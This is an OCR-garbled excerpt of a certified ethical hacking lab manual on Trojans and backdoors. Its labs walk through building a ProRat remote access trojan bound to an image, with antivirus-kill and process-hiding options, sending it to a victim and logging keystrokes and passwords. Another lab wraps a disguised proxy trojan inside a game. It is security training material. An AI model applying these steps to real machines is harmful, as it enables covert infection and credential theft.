CEHv8 Module 06 - Trojans and Backdoors

CEH Lab M an ual
Trojans and
Backdoors
M od u le 06
Module 06 - Trojans and Backdoors
Trojans and Backdoors

A Trojan is a program that contains a malicious or harmful code inside apparently
harmless programming or data in such a iray that it can get control and cause
damage, such as mining thefile allocation table on a hard drive.
I C ON KEY L ab S c e n a rio
1^ ~ ! Valuable According to Bank Into Security News (http://www.bankinfosecurity.com),
information
Trojans pose serious risks tor any personal and sensitive information stored 011
Test t o u t compromised Android devices, the FBI warns. But experts say any mobile
knowledge______ device is potentially at risk because the real problem is malicious applications,
m Web exercise which 111 an open environment are impossible to control. And anywhere
malicious apps are around, so is the potential for financial fraud.
W orkbook review
According to cyber security experts, the banking Trojan known as citadel, an
advanced variant o f zeus, is a keylogger that steals online-banking credentials by
capturing keystrokes. Hackers then use stolen login IDs and passwords to
access online accounts, take them over, and schedule fraudulent transactions.
Hackers created tins Trojan that is specifically designed for financial fraud and
sold 011 the black market.
You are a security administrator o f your company, and your job responsibilities
include protecting the network from Trojans and backdoors, Trojan attacks, the
theft o f valuable data from the network, and identity theft.
L ab O b jectiv es
The objective o f tins lab is to help students learn to detect Trojan and b ack d oor
attacks.
The objective o f the lab include:
■ Creating a server and testing a network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all
vulnerabilities and flaws detected
& T o o ls L ab E nvironm ent

d e m o n str a te d in
th is lab are To carry out tins, you need:
a v a ila b le in
‫י‬ A computer mnning W indow S erver 2 0 0 8 as Guest-1 in virtual machine
D:\CEH-
Tools\CEH v8 ‫י‬ W indow 7 mnning as Guest-2 in virtual machine
M odule 0 6 T rojans
‫י‬ A web browser with Internet access
and B a ck d o o rs
■ Administrative privileges to nin tools
C E H L ab M an u al P age 425 E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Lab Duration
Time: 40 Minutes
Overview of Trojans and Backdoors

A Trojan is a program that contains m a lic io u s or harm till code inside apparently
harmless program m ing 01‫ ־‬data 111 such a way that it can g e t con trol and cause
damage, such as mining die file a llo c a tio n table 011 a hard disk.
With the help o f a Trojan, an attacker gets access to sto r ed p a ssw o r d s in a
computer and would be able to read personal documents, d e le te file s, d isp lay
p ictu res, an d /01‫ ־‬show messages 011 the screen.
Lab Tasks
TASK 1
Pick an organization diat you feel is worthy of your attention. Tins could be an
O verview educational institution, a commercial company, 01‫ ־‬perhaps a nonprotit chanty.
Recommended labs to assist you widi Trojans and backdoors:
■ Creating a Server Using the ProRat tool
■ Wrapping a Trojan Using One File EXE Maker
■ Proxy Server Trojan
■ HTTP Trojan
■ Remote Access Trojans Using Atelier Web Remote Commander
‫י‬ Detecting Trojans
‫י‬ Creating a Server Using the Theet
■ Creating a Server Using the Biodox
■ Creating a Server Using the MoSucker
‫י‬ Hack Windows 7 using Metasploit
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion 011
your target’s security posture and exposure dirough public and tree information.
P L E A S E TALK T O Y O U R I N S T R U C T O R IF YOU H A V E Q U E S T I O N S
R E L A T E D T O T H I S LAB.

M odule 0 6 - T rojans and Backdoors
Lab
Creating a Server Using the ProRat

Tool
A Trojan is a program that contains malicious or harmful code inside apparent/)‫׳‬
harmless programming or data in such a way that it can get control and cause
ICON KEY Lab Scenario

1 ^ 7 Valuable As more and more people regularly use die Internet, cyber security is becoming
information
more im portant for everyone, and yet many people are not aware o f it. Hacker
Test your are using malware to hack personal information, financial data, and business
knowledge information by infecting systems with viruses, worms, and Trojan horses. But
= Web exercise Internet security is not only about protecting your machine from malware;
hackers can also sniff your data, which means that the hackers can listen to your
m W orkbook review communication with another machine. O ther attacks include spoofing,
mapping, and hijacking.
Some hackers may take control o f your and many other machines to conduct a
denial-of-service attack, which makes target computers unavailable for normal
business. Against high-profile web servers such as banks and credit card
gateways.
include protecting the network from Trojans and backdoors, Trojan attacks,
Lab Objectives
The objective o f tins lab is to help suidents learn to detect Trojan and backdoor
& T o o ls
attacks.
d e m o n str a te d in
th is lab are The objectives o f the lab include:
a v a ila b le in
■ Creating a server and testing the network for attack
D:\CEH-
Tools\CEH v8 ■ Detecting Trojans and backdoors
M odule 0 6 T rojans
and B a ck d o o rs
C E H L ab M an u al P age 427 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

‫י‬ Attacking a network using sample Trojans ancl documenting all

Lab Environment
To earn‫ ״‬tins out, you need:
■ The Prorat tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans
and Backdoors\Trojans Types\Rem ote A ccess Trojans (RAT)\ProRat
■ A computer running Windows Server 2012 as Host Machine
■ A computer running Window 8 (Virtual Machine)
■ Windows Server 2008 running 111Virtual Machine
‫י‬ Administrative privileges to run tools
Lab Duration
Tune: 20 Minutes

A Trojan is a program that contains m alicious or harmful code inside apparently
harmless programming or data in such a way that it can g et control and cause
damage, such as ruining die file allocation table on a hard drive.
Note: The versions of the created Client or Host and appearance of the website may
differ from what is 111 die lab, but the acmal process of creating the server and die
client is the same as shown 111 diis lab.
Lab Tasks
Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module
06 Trojans and Backdoors\Trojans Types\Rem ote A ccess Trojans
Create Server
(RAT)\ProRat.
with ProRat
2. Double-click ProR at.exe 111 Windows 8 Virtual Machine.
3. Click C reate Pro Rat Server to start preparing to create a server.
C E H L ab M an u al P age 428 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

M od ule 0 6 - T rojans and Backdoors
P f l D H R C H . n E T F«OFE55IC]f‫>־‬HL IflTEHnET !!!

Connect
English
PC Info Applications
Message Windows
Admin-FTP
Funny Stuff File Manager
!Explorer Search Files
Control Panel Registry
Shut Down PC
Clipboard KeyLogger
Give Damage Passwords
R. Downloder
Printer
Online Editor ProConnective
Create
‫ ► י‬Create Downloader Server (2 Kbayt)
Create CGI V ictim List (16 Kbayt)
^Help
F IG U R E 1.1: P ro R at m ain w indow
4 . The C reate Server window appears.
Create Server
ProConnective Notification (Network and Router)
Notifications S u p p o rts R e ve rse C o n n e c tio n
1y=J P assw o rd bu tto n : ‫ט‬ Use ProConnective Notification Test
R etrieve passw ords from
General Settings IP (DNS) Address: »ou. no*1p.com
m any services, su ch as
p o p 3 acco u n ts, m essenger, Mail Notification
IE , mail, etc. D oesn't support R everse Connection
Bind with File Test
Q Use Mail Notification
E-MAIL: bomberman@y ahoo. com

Server Extensions
ICQ Pager Notification
D oesn't suppoit R everse Connection
Server Icon Q Use ICQ Pager Notification

ic q u in : [r] Test
CGI Notification
D oesn't support R everse Connection
W) Help Test
Q Use CGI Notification
CGI URL: http: //w w w.yoursite. com/cgi-bin/prorat. cgi
Create Server
Server Size: 342 Kbayt
r
F IG U R E 1.2: P ro R at Create Server W indow
5. Click General S ettings to change features, such as Server Port. Server

Passw ord, Victim Name, and the Port Number you wish to connect
over the connection you have to the victim or live the settings default.
6. Uncheck the highlighted options as shown 111 the following screenshot.
C E H L a b M a n u a l P a g e 429 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

Server Port:
Server Password:
General Settings Victim Name:

Q 3ive a fake error message.
Q ••1elt server on install.
Bind with File
Q Cill AV-FW on start.
Q disable Windows XP SP2 Security Center
Server Extensions I......Q Disable Windows XP Firewall.
Q Hear Windows XP Restore Points.
Server Icon Q )on't send LAN notifications from ( i 92.i 68.”.“j or (10.*.x.xj
I I Protection for removing Local Server
Invisibility
Q Hide Processes from All Task Managers (9x/2k/XP)
I t y ! N o te : y o u can use
D ynam ic D N S to co n n ect Q Hide Values From All kind of Registry Editors (9x/2k/XP)
o v er th e In te rn e t b y using Q Hide Names From Msconfig (9x/2k/KP)
n o -ip acco u n t registration. Q UnT erminate Process (2k/XP)
Create Server
r
F IG U R E 1.3: P ro R a t C reate S erver-G eneral Settings
7. Click Bind w ith File to bind the server with a file; 111 tins labwe are
using the .jpg file to bind the server.
8. Check Bind s e r v e r w ith a file . Click S e l e c t F ile, and navigate to
Z:\CEHv8 M odule 0 6 T rojan s an d B a c k d o o r s\T r o ja n s T y p e s\R e m o te
A c c e s s T rojan s (R A T )\P roR at\lm ages.
9. Select the Girl.jpg file to bind with the server.
m C lipboard: T o read
d ata from ran d o m access
m em ory.
This File will be Binded:
Bind with File
Server Extensions
Server Icon
Create Server
I----------------------
F IG U R E 1.4: P ro R at Binding w ith a file
C E H L a b M a n u a l P a g e 430 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

10. Select Girl.jpg 111 the window and then click Open to bind the file.
Look in: Images
‫ו‬11°‫ת ז‬
£Q1 VNC Trojan starts a

VNC server daemon in the
infected system.
File name: Girl Open
Files of type: Cancel
FIGURE 1.5: ProRat binding an image
11. Click OK after selecting the image for binding with a server.
£ 9 File manager: To
manage victim directory for
add, delete, and modify.
12. 111 Server E xtensions settings, select EXE (lias icon support) 111 S e lec t
Server Extension options.

Select Server Extension

Notifications
^ EXE (Has icon support) Q SCR (Has icon support)
Q PIF (Has no icon support) Q COM (Has no icon support)

General Settings
Q BAT (Has no icon support)
Bind with File
Server Extensions
Server Icon
£ Q Give Damage: To
format the entire system
files.
Create Server
r
FIGURE 1.7: ProRat Server Extensions Settings
13. 111 Server Icon select any o f the icons, and click the Create Server
button at bottom right side o f the ProRat window.
Notifications
General Settings
M
Bind with File
Server Extensions
m It connects to the
victim using any VNC
viewer with the password
“secret.”
Server Icon H U 11
V) Help jJ
Server Icon: Choose new Icon
Create Server
I
FIGURE 1.8: ProRat creating a server
14. Click OK atter the server has been prepared, as shown 111 the tollowing
screenshot.
C E H L ab M an u al P age 432 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

FIGURE 1.9: PioRat Server has created 111 die same current directory
15. N ow you can send die server file by mail or any communication media
to the victim ’s machine as, for example, a celebration file to run.
£ G SHTTPD is a small
HTTP server that can be Applicator Tools
embedded inside any Vicvr M anage A&

program. It can be wrapped E m Preriew pane S t Extra large icons Large icons ‫־‬t N" □ Item check boxes
with a genuine program fj‫־‬fi Details pa ne f t | M5d u n icons | | j Small icons ₪‫־‬ □ F ilenam e extensions
1
(game cl1ess.exe). When S Lirt |j‫״‬ Details I I Hidden items
______________ Layout_________ Show/hide

executed, it turns a
computer into an invisible o © ^ « Trcjans Types ► Femote Access Trojans (RAT)
‫נ ״י‬
web server. A
K Favorites
*. J . D ow n lea d
■ D esktop Irra c e s
£ D ow nload} J . L an g u a g e
1S3J R ecen t places |^ b n d e d .s e r v e r |

^ 1Fnglish
1‫ ^־‬f Libraries £ ProRat
F*| D o c u m tn te j__ R eadm e
J * M usic ^ T ‫ ״‬rk 6 h
f c l P ic tu ‫«׳‬c |__ V ersion.R enew als
Q j Videos
H o m e g ro jp
C o m p u te i
s L , Local Disk O
5 ? CEH -Tools ( \ \ 1 a
^(1 N etw o rk v
9 ite m s 1 ite m se lec te d 2 0 8 MB
FIGURE 1.10: ProRat Create Server
16. N ow go to Windows Server 2008 and navigate to Z:\CEHv8 Module 06

Trojans and Backdoors\Trojans Types\Rem ote A c c e s s Trojans
(RAT)\ProRat.
17. Double-click binder_server.exe as shown 111 the following screenshot.

All Rights Reserved. Reproduction is Strictly Prohibited.
. p | ‫ י‬T‫׳‬0J%n(Trt>« » Rencte Acr«s "roiflrs RAT( ‫ * י‬PraRat ital

El• id t ^ •w Tjolc t#lp
View Oroanize ▼• ‫״‬ ^ 0 ° *°

M t
Tavoi ite -»‫־‬ks
I •I Site H T "T ™----------------- Pate modified— 1
|-| Typ |- >
i | r>ornn#ntc
£ ?1cajres
^ Music
More »
[ : R eadne
Folders v
[^‫־‬uHoct
I J i Botnet 'r o ja r s j j
j , Ya5»cn_R.c‫«־‬n o5
I ^ Com nand Shell ~r0)s
I D efacenent ‫ ־‬ro;ars
I J 4 D e s tn ja v e T'ojans
I Ebandng Trojans
I J 4 E-Mal T 0 ‫׳‬j3ns
I JA FTP Trojar
I GUITrojors
I HTTP H I P S "rp jars
I S ICMP Backdoor
I J 4 MACOSXTrojons
I J i Proxy Server Trojan:
. Remote Access “rcj?- *
I J . Apocalypse
X Atelie‫ ׳‬Web Remji
I 4 . D*fkCo‫׳‬r«tRAT
I j.. ProRat
I . VNC’ rojans H
£ M arl C S. ‘ . New Text Docuneil • No... I -O g *
FIGURE 1.11: ProRat Windows Server 2008
18. Now switch to Windows 8 Virtual Machine and enter the IP address o f
ICMP Trojan: Covert Windows Server 2008 and the live port number as the default 111 the
channels are methods in ProRat main window and click Connect.
which an attacker can hide
data in a protocol diat is 19. 111 tins lab, the IP address o f Windows Server 2008 is (10.0.0.13)
undetectable.
Note: IP addresses might be differ 111 classroom labs
F T ProRat V1.9
m um -
Poit
Message Windows
Chat Admin-FTP
Funny Stuff File Manager
!Explorer Search Files
Control Panel Registry
Shut Down PC Screen Shot
Clipboard KeyLogger
Give Damage Passwords
R. Downloder
Printer Services
Online Editor ProConnective
Create
FIGURE 112: ProRat Connecting Infected Server
20. Enter the password you provided at the time ol creating the server and
click OK.

Password:
OK Cancel
FIGURE 1.13: ProRat connection window
21. N ow you are con n ected to the victim machine. To test the connection,
click PC Info and choose the system information as 111 the following
figure.
BfP >
>—ProRat V1.9 IConnected[10.0.0.13^^^H B B B ^^^^^r‫ ׳‬- x1
P P D H P C H . n E T P P O F E 5 5 I C 1 n F I L i n T E R r i E T !!!
Poit: g m r Disconnect
m Covert channels rely
on techniques called
tunneling, which allow one
English
IB //////// PC Information ////////
10
protocol to be carried over PC Info Applications
Computer Name WIN-EGBHISG14L0
another protocol. Message Windows
User Name Administrator
Chat Admin-FTP Windows Uer
Funny Stuff File Manager Windows Language English (United St
!Explorer Search Files Windows Path C :\Windows
Control Panel Registry System Path C :\Windows\systemc
Temp Path C:\Users\ADMINI~1\
Productld
Clipboard KeyLogger Workgroup NO
Give Damage Passwords Data 9/23/2012
R. Downloder Run
l-L
Printer Services
Online Editor F'roConnective System Information Mail Address in Registry
Create Last visited 25 web sites W ; Help
Pc information Received.
FIGURE 1.14: ProRat connected computer w idow
22. N ow click KeyLogger to ste a l user passwords for the online system.
m TASK 2
[ r ? ~ ^ r o R a ^ 7 ^ o n n e c t e d n 0 l0l0 ^ 3 r ~
P H □ H R C H .‫ ח‬E T P P G re S S ID n P L in T E P riE T !!!
Attack System ip: Q j Q 2 P011: g n i R: Disconnect I I 1 11 h
Using Keylogger
//////// PC Information ////////
Computer Name WIN-EGBHISG14L0
Message Windows
User Name Administrator
Chat Admin-FTP Windows Uer
Funny Stuff File Manager Windows Language English (United St
!Explorer Search Files Windows Path C :\Windows
Control Panel Registry System Path C :\Windows\systerna
Temp Path C:\Users\ADHINI~1\
Productld
Clipboard KeyLogger Workgroup NO
Give Damage Passwords Data 9/23/2012
R. Downloder Run
Printer Services
Li.
Online Editor ProConnective System Information Mail Address in Registry
Create Last visited 25 web sites W ; Help
Pc information Received.
FIGURE 1.15: ProRat KeyLogger button

23. The Key Logger window will appear.
m Tliis Trojan works

like a remote desktop
access. The hacker gains
complete GUI access of
the remote system:
■ Infect victim’s computer
with server.exe and plant
Reverse Connecting
Trojan.
■ The Trojan connects to
victim’s Port to the
attacker and establishing
a reverse connection.
■ Attacker then has
complete control over FIGURE 1.16: ProRat KeyLogger window
victim’s machine.
24. N ow switch to Windows Server 2008 machine and open a browser or
N otepad and type any text.
i T e x t D o c u m e n t - N o te p a d
File Edit Format View Help

Hi t h e r e ‫פר‬
T h i s i s my u s e r n a m e : x y z @ y a h o o .c o m
p a s s w o r d : test< 3@ #S !@ l|
m Banking Trojans are

program that steals data
from infected computers
via web browsers and
protected storage. Ik. A
FIGURE 1.17: Test typed in Windows Server 2008 Notepad
25. While the victim is writing a m e ssa g e or entering a user nam e and
password, you can capmre the log entity.
26. N ow switch to Windows 8 Virtual Machine and click Read Log from
time to time to check for data updates trom the victim machine.

E
=9/23/201211:55:28 PM-
ahi bob this is my usemame;xyzatyahoo.com
password; testshiftl buttowithl shiftbuttonwith2
| Read Log | Delete Log Save as Clear Screen Help
L•^L1‫—י‬
■UL 1 !_•‫ רו‬11•_‫י‬t 1 C □ 1----------------------------------------------
|KeyLog Received. |
FIGURE 1.18: ProRat KeyLogger window
27. N ow you can use a lot o f feauires from ProRat on the victim’s machine.
Note: ProRat Keylogger will not read special characters.
Lab Analysis
Analyze and document die results related to die lab exercise. Give your opinion on
your target’s secunty posture and exposure dirough public and free information.
P L E A SE TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S

Questions
1. Create a server wkh advanced options such as Kill AV-FW on start, disable
Windows XP Firewall, etc., send it and connect it to the victim machine,
and verify whedier you can communicate with the victim machine.
2. Evaluate and examine various mediods to connect to victims if diey are 111
odier cities or countries.

T o o l/U tility In fo rm atio n C o llected /O b jectiv es A chieved

Successful creation o f Blinded server.exe
O u tp u t: PC Information
Computer NameAYIN-EGBHISG 14LO
User Name: Administrator
W indows Yer:
P ro R at T o o l Windows Language: English (United States)
W indows Path: c:\windows
System Path: c:\windows\system 32
Tem p Path: c :\U se rs\A D M IN I~ l\
Product ID:
Workgroup: N O
Data: 9/23/2012
In tern e t C o n n ectio n R eq u ired

□ Yes 0 No
P latform S up p o rted
0 C lassroom 0 !Labs

Lab
Wrapping a Trojan Using One File

EXE Maker
A Trojan is aprogram that contains malicious or harmful code inside apparently
harmlessprogramming or data in such a way that it canget control and cause
I CON KE Y Lab Scenario
£17 Valuable Sometimes an attacker makes a very secure backdoor even more safer than the
information
normal way to get into a system. A normal user may use only one password for
Test your using the system, but a backdoor may need many authentications or SSH layers
knowledge to let attackers use the system. Usually it is harder to get into the victim system
Web exercise from installed backdoors compared with normal logging 111. After getting
control of the victim system by an attacker, the attacker installs a backdoor on
‫ט‬ Workbook review the victim system to keep 111s or her access in the future. It is as easy as running
a command on the victim machine. Another way the attacker can install a
backdoor is using ActiveX. Wlienever a user visits a website, embedded
ActiveX could run on the system. Most o f websites show a message about
running ActiveX for voice chat, downloading applications, or verifying the user.
111 order to protect your system from attacks by Trojans and need extensive
knowledge on creating Trojans and backdoors and protecting the system from
attackers.
& Tools Lab Objectives

demonstrated in
this lab are The objective of tins lab is to help smdents learn to detect Trojan and backdoor
available in attacks.
D:\CEH- The objectives o f the lab mclude:
Tools\CEHv8
Module 06 Trojans ■ Wrapping a Trojan with a game 111 Windows Server 2008
and Backdoors
■ Running the Trojan to access the game on the front end

■ Analyzing the Trojan running in backend
Lab Environment
To carry out diis, you need:
‫י‬ OneFileEXEMaker tool located at D:\CEH-Tools\CEHv8 Module 06
Trojans and Backdoors\Wrapper Covert Programs\OneFileExeMaker
■ A computer running Window Server 2012 (host)

■ Windows Server 2008 running in virtual machine
■ It you decide to download the la te st version, then screenshots shown
111 the lab might differ
■ Administrative privileges to run tools
Lab Duration
Tune: 20 Minutes

A Trojan is a program diat contains m alicious or harmful code inside apparendy
harmless programming or data 111 such a way that it can get control and cause
damage, such as ruining die hie allocation table on a hard drive.
Note: The versions of die created client or host and appearance may ditfer from
what is 111 die lab, but die actual process o f connecting to die server and accessing
die processes is same as shown 111 dus lab.
H TASK 1 Lab Tasks

OneFile EXE 1. Install OneFileEXEMaker on Windows Server 2008 Virtual Machine.
Maker Senna Spy One EXE M a k e r 2 0 0 0 2.0a
Senna Spy One EXE Maker 2000 - 2.0a

O fficial W ebsite: http://sennaspy.tsx.org
e-mail: senna_spy0 holm a1l.com ICQ UIN 3973927
Join many files and make a unique EXE file.

This piogram allow join all kind of files: exe, dll. ocx. txt, jpg. bmp
Automatic OCX file register and Pack files support
W indows 9x. NT and 2000 compatible !
Short File Name Parameters 10 pen M ode | Copy T o | Action
Command Line Parameters. Open Mode Copy To------ Action------

C Open/Execute r Pack Fies?
C Normal (“ Windows
C Maximized C System C Copy Only
C Minimized C Temp
Copyright (C). 1998-2000. By Senna Spy C Hide C Root
m
FIGURE 3.1: OneFile EXE Maker Home screen

Click die Add File button and browse to the CEH-Tools folder at die
location Z:\CEHv8 Module 06 Trojans and Backdoors\Games\Tetris and
add die Lazaris.exe hie.
Senna Spy One EXE M a k e r 2 0 0 0 - 2.0a
Senna Spy One EXE Maker 2000 - 2.0a

O fficial W ebsite: http://sennaspy tsx org
less! You can set various
e-mail: senna_spy@hotma1l.com ICQ UIN 3973927
tool options as Open
mode, Copy to, Action Join many files and make a unique EXE file.
This program allow join all kind of files: exe. d ll, ocx. txt, jpg, bmp .
[sh o rt File Name |Parameters |0 p e n Mode |Copy To | Action ! Add Fie

LAZARIS.EXE Hide System | O pen/Execute 1
Getete
Save
Ejj*
Command Line Parameters Open Mode Copy T0 -----

C Normal C Windows (• Open/Execute
r Maximized (* System C Copy On|y
C Minimized C Temp
Copyright (C). 1998-2000. By Senna Spy (5‫ ־‬Hide C Root
FIGURE 3.2: Adding Lazaris game
3. Click Add File and browse to the CEH-Tools folder at die location
Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server
Trojans and add die m cafee.exe file.
Senna Spy O ne E X E Maker 2000 - 2.0a

O fficial W ebsite: http://sennaspy.tsx.org
e-mail: senna_spy@hotmail.com ICQ UIN 3973927

This program allow join all kind of files: exe. dll. ocx. txt, jpg. bmp
W indows 9x. NT and 2000 compatible I
& Tools
demonstrated in Short File Name Parameters | Open Mode | Copy To |A ction Add Fie
System O pen/Execute
this lab are I System | O pen/Execute delete
available in Save
D:\CEH-
Tools\CEHv8 Command Line Parameters Open Mode Copy To!----- Action------
C Windows (• Operv‫׳‬Execute r PackFies?
C Normal
Module 06 Trojans C Maximized (* System C Copy Only
C Minimized ‫ ׳‬Temp
and Backdoors Copyright |C|, 1998-2000. By Senna Spy (* Hide C Root
FIGURE 3.3: Adding MCAFEE.EXE proxy server
4. Select Mcafee and type 8 0 8 0 111 die Command Line Parameters field.

Senna Spy One EXE M a k e r 2 0 0 0 2.0a
Senna Spy O ne EXE Maker 2000 2.0 ‫־‬a

O fficial W ebsite http ://sennaspy tsx org
e-mail: senna_spy@hotmail.com ICQ UIN: 3973927

This piogram allow !oin all kind of files: exe. dll. ocx. txt. jpg. bmp
Automatic OCX file !egistei and Pack files support
Short File Name Paiameters Open Mode Copy To Action

LAZARIS.EXE System O pen/Execute
O pen/Execute
Save
Command Line Parameters Open Mode— Copy To------

C Normal C Windows Open/Execute ‫“י‬ P *kF le s?
C Maximized (* System C Copy On|y
C Minimized Temp
Copyright (C). 1998-2000. By Senna Spy ^ Hide C Root
FIGURE 3.4: Assigning port 8080 to MCAFEE
5. Select Lazaris and check die Normal option in Open Mode.

Senna Spy One EX£ M a k e r 2 0 0 0 2.0a
Senna Spy One EXE Maker 2000 2.0 ‫־‬a

O fficial W ebsite: http ://sennaspy tsx org
e-mail: senna_spy@hotmail.com ICQ UIN 39/3 92 7

This piogram allow join all kind of files: exe. dll. ocx. txt. jpg. bmp ...
Add Fie
LAZARIS.EXE Notmal (System I O pen/E xecute I
MCAFEE EXE 8080 Hide System O pen/Execute Delete
Save
Exit
Command Line Parameters Open Mode Copy To------ Action

‫־׳‬: p.0 1 ™‫״‬ C Windows (• Operv‫׳‬Execute r Pack Fies?
1 .Maximize
Jaximized <• System C Copy On|y
C Minimized C Temp
^ © 2 Copyright (C). 1998 2000. By Senna Spy C Hide C Root
FIGURE 3.5: Setting Lazaris open mode
6. Click Save and browse to save die tile on the desktop, and name die tile
Tetris.exe.

Save n | K ‫י‬-» *‫ ז‬0‫ש‬ 2[ 0‫ נ® ־‬a ₪ ‫־‬
1 Name *■ I - I Size 1*1 Type 1*1 Date modified 1
e-mail: sennas
^Pubk
: ■ Computer
4 * Network
® M o zia F re fb x 1 KB Shortcut 9/18/2012 2:31 Af
£ Google Chrome 2 KB Shortcut 9/18/2012 2:30 AT
_l ±1
Short File Name |------Save------1
MCAFEE.EXE (Executables (*.exe) _^J Cancel |
Save
L Open Mode Copy To

r Pack Fies?
(• Normal C Windows (• Open/Execute
C Maximized (* System C Copy 0n|y
‫־‬ C Minimized (" Temp
Copyright (C), 1998-2000. By Senna Spy C Hide C Root
FIGURE 3.6: Trojan created
7. Now double-click to open die Tetris.exe file. Tliis will launch die Lazaris
m MCAFEE.EXE will , ,
run in background g am€> 011 th e tr011t e ‫ ״‬d •
FIGURE 3.7: La2aris game
8. Now open Task Manager and click die P rocesses tab to check it McAfee
is running.

£ J W indows Task M anager ^ ‫[ *[ ס‬

File O ptions View Help
Applications Processes jServices | P erform ance j Networking | Users |
Im a g e ... 1 User Name 1[ cpu] Memory (... | Description |

csrss.exe SYSTEM 00 1 .4 6 4K Client S e r... 1
csrss.exe SYSTEM 00 1.7 3 6K Client S er...
dw m .exe A dm lnist... 00 1,200 K D e s k to p ...
e xplo re r.e xe Adm m ist... 00 14,804 K W indows ...
LAZARIS.EXE ... A dm lnist... 00 1.5 4 0K LAZARIS
Isass.exe SYSTEM 00 3,100 K Local S ecu ... -
Ism.exe SYSTEM 00 1 .3 8 4K Local Sess...
1 MCAFEE.EXE ... A d m n s t... 00 580 K MCAFEE
m sdtc.exe NETW O... 00 2 .8 3 2 K MS DTC co...
S creenpresso... . A dm irilst... 00 2 8 .3 8 0 K S creenpre...
se rvices.exe SYSTEM 00 1 .9 9 2K Services a ...
SLsvc.exe NETW O... 00 6 .7 4 8 K M ic ro s o ft...
smss.exe SYSTEM 00 304 K W indows ...
spoolsv.exe SYSTEM 00 3 .5 8 8 K Spooler S ...
svch ost.exe SYSTEM 00 13,508 K H o s tP ro c ...
svch ost.exe LOCAL ... 00 3.648 K H o s tP ro c ... ■
I* Show processes from all users gnc| process
|jP ro:esses: 40 CPU Usage: 2°.‫׳‬c Physical Memory: 43°.‫׳‬c
FIGURE 3.8: MCAFEE in Task manager
Lab Analysis
Analyze and document the results related to die lab exercise. Give your opinion 011
your target’s secunty posture and exposure dirough public and free information.
P L E AS E TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S


E X E M aker O u tp u t: Using a backdoor execute T etris.exe
Questions
1. Use various odier options for die Open mode, Copy to, Action sections of
OneFileEXEMaker and analyze the results.
2. How you will secure your computer from OneFileEXEMaker attacks?

Internet Connection Required

□ Yes 0 No
P latform S upported
0 C lassroom 0 iLabs

Proxy Server Trojan

A. Trojan is a program that contains malicious or harmful code inside apparently
harmless programming or data in such a )ray that it can get control and cause
I CON KE Y Lab Scenario

P~/ Valuable You are a security administrator o f your company, and your job responsibilities
information
Test vom‫׳‬ theft o f valuable data from the network, and identity theft.
knowledge
— Web exercise Lab Objectives

m Workbook review The objective o f tins lab is to help students learn to detect Trojan and backdoor
attacks.
The objectives o f tins lab include:
• Starting McAfee Proxy
• Accessing the Internet using McAfee Proxy
Lab Environment
■ McAfee Trojan located at D:\CEH-Tools\CEHv8 Module 06 Trojans and
Backdoors\Trojans Types\Proxy Server Trojans
JT Tools
demonstrated in ■ A computer running Window Server 2012 (host)
this lab are
■ Windows Server 2008 running in virtual machine
available in
D:\CEH- ■ If you decide to download the la te st version, then screenshots shown
Tools\CEHv8 111 the lab might differ
Module 06 Trojans
and Backdoors ‫י‬ You need a web browser to access Internet
‫י‬ Administrative privileges to m n tools
Lab Duration
Time: 20 Minutes


damage, such as ruining die hie allocation table 011 a hard drive.
Note: The versions o f the created cclient or host and appearance may differ from
what it is 111 die lab, but die actual process of connecting to die server and accessing
die processes is same as shown 111 diis lab.
£ TASK Lab Tasks

Proxy server - 1. In Windows Server 2008 Virtual Machine, navigate to Z:\CEHv8
Mcafee Module 06 Trojans and Backdoors\Trojans Types, and right-click
Proxy Server Trojans and select CmdHere from die context menu.
jra C > |i■ * C D -v3'‫־‬teduc05T ro:o‫««־‬nd30ccdo0f3 - "rojanaTypes
P it E dt view Toos ndp
O rgsncc » Vca ‫־‬s * S ' s ® 1‫' ״‬ w
F N n‫ •״‬- - C * » n o d ri« d M Tvp# M Sat M

j , Bl*d0«rryT'0)jn
pi Documents J( T'0j*tk
£ Picture* ,Jf C an ru n d 5h*l "rajjin*
^ Mjflic J j D*t»c«‫׳‬rw«tT‫׳‬a|arK
‫•־‬tore » J f D estruetve Trojans

J t Sw oonc Trojans
J tE - f 'd l r3:3rs
Folders ‫׳יי‬
Jk F T iro jar
J i R e o srv Mon tor _±_
J t G J: Trojans
| . Startup P'cgrarr* W
JlM TPh-TTFST'O jans
JA ‫ ־‬rojansT/pes
JtlO P B d C W o o ‫־‬
3ladd>e‫־‬ry Trojan j.MACOSXTtoaTS
| . Comrrand Srel Trt R=nctc A< COer

j . 3ef3GemertTro;a• J t VMC ‫ ־‬raja
1 . 3estrjc&'/e “ rojor R»stora previOLS versions
J . -banbrgT-qjarts
1. Trojers S erdT o ►
i . '^ P T 'cjo n Q it
i . SUIT'ojans C30V
L. -T IP t-rr‫־‬P5 Tro;a
C‫׳‬e a re 9 xjrtcjt
I , :CKPBdCkdCOr
Delete
Rename
Proxy Se‫־‬ver Irojf
Jg \ \ 35PtOtv TrQ* Prooenes
- .. t i n m i G H ‫־‬: ‫ ־־‬.
FIGURE 4.1: Windows Server 2008: CmdHere
2. Now type die command dir to check for folder contents.
FIGURE 4.2: Directory listing of Proxy Server folder
3. The following image lists die directories and files 111 the folder.

-1‫ | ם‬x
|Z :\C E H v 8 M odule 06 T r o j a n s a n d B a c k d o o r s S T r o j a n s T y p e s \P r o x y S e r v e r T r o j a n s > d i r
I U o lu n e i n d r i v e Z h a s n o l a b e l .
I U o lu n e S e r i a l N um ber i s 1677-7DA C
I D i r e c t o r y o f Z :\C E H v8 M odule 06 T r o j a n s a n d B a c k d o o r s V T r o ja n s T y p e s \P r o x y S e r v e
I r T r o ja n s
1 0 9 /1 9 /2 0 1 2 0 1 : 0 7 AM <DIR>
1 0 9 /1 9 /2 0 1 2 0 1 : 0 7 AM <DIR>
